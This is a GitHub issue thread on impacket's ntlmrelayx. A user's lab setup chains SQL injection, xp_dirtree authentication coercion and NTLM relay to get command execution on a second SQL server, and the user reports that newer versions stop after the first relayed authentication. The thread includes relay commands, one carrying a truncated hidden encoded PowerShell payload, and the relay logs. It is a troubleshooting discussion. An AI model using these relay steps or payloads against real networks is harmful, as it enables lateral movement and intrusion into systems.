### ISSUE TITLE
ntlmrelayx gives different output on different versions

### ISSUE THREAD

**Issue by Althibyani** [fortra/impacket#1620]
### Configuration  
impacket version:  v0.11.0 & v0.9.24
Python version:  3

attacker machine: 10.10.10.100 kali linux 2023.3
SQL01 = 10.11.12.21
SQL02 = 10.11.12.22

The idea as follow:

- I have SQLi on SQL01 server. The MSsql service is running in context of sql-svc service account (domain env)

- Service Account SQL-SVC has high privileges on both SQL01 & SQL02 (I added him to local administrators group) 

- Both machines has signing off

- So, by setting up ntlmrelayx.py on kali linux, we can use xp_dirtree to access \\10.10.10.100\fakeshare share on kali from SQL01 to target SQL02 using the ntlmrelayx.py since sql-svc has high privileges.

- The normal result is a success attack that gave me a Command execution on SQL02

The problem is , this attack went successfully using Impacket 0.9.24. But it did work uing Impacket 0.11.0 & 0.10.0

In 0.9.24 the relay received the first auth request which was SQL01$ machine Account l, I know that the MSSQL is running in context for SQL-SVC user but I do not know why I received request from SQL01$ first. However Since it does have any privileges on SQL02 the next step is failed which is the command execution.

The good thing in 0.9.24 it keeps receive the second auth request which this time is from SQL-SVC and the whole attack will succeed.

But for 0.10.0 & 0.11.0 the attack stopped completely after first request which is basically will fail to execute cuz SQL01$ machine account does not have any privileges on SQL02. Here the attack stops and not continuing to receive the second request like what happened with 0.9.24

please check photo bellow to understand more 

Impacket 0.11.0

![IMG_8878](https://github.com/fortra/impacket/assets/51813678/2e098ae9-f14c-4a93-871b-180f9563986e)

Imapcket 0.9.24

![IMG_8877](https://github.com/fortra/impacket/assets/51813678/38a6a23b-36d0-40f5-853e-1cc1e53521ad)
   
   
So, where is the issue here?

**Comment by 0xdeaddood** [comment]
Hi @Althibyani!

How are you running `ntlmrelayx.py` in v0.10.0? What flags are you setting? 

In that version, we introduced some changes in the default behavior of the example regarding the multi-relay feature. I think your problem might be related to that.

Please check [this blogpost](https://0xdeaddood.rocks/2022/05/16/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/) for more information.

**Comment by Althibyani** [comment]
Hi @0xdeaddood 

This was my command on all tested versions "v0.9.24, v0.10.0 & v0.11.0"

proxychains -q ntlmrelayx.py -t ip -smb2support --no-http-server -c "whoami > C:\output.txt"

v0.9.24 = works fine and catch two auth, SQL01$ & SQL-SVC which is the needed account to complete the attack.

v0.10.0 & v0.11.0 = both of versions, the relay stopped after first auth "SQL01$" failed to execute commands. not like v0.9.24 which continue to relay until it gets the right user which is SQL-SVC.

**Comment by 0xdeaddood** [comment]
You can try setting a named target (DOMAIN\SQL-SVC@IP)

**Comment by Althibyani** [comment]
> You can try setting a named target (DOMAIN\SQL-SVC@IP)

Hi @0xdeaddood,

Thank you for replay. I already tried, and I tried again just a few minutes ago.


```
proxychains -q ntlmrelayx.py -t testlab\sql-svc@10.11.12.22 -smb2support --no-http-server -c "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByA......[snip]" 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Connection from TESTLAB/SQL01$@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-5 (process_request_thread): Connection from TESTLAB/SQL01$@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-6 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
```

The command did not get executed on 10.14.15.21. However, still same result even with different ways, v0.9.23 worked completely fine.

**Comment by anadrianmanrique** [comment]
I think the correct command line args are:
ntlmrelayx.py -t TESTLAB/SQL-SVC@10.11.12.22

**Comment by anadrianmanrique** [comment]
@Althibyani please recheck after #1741. Thanks
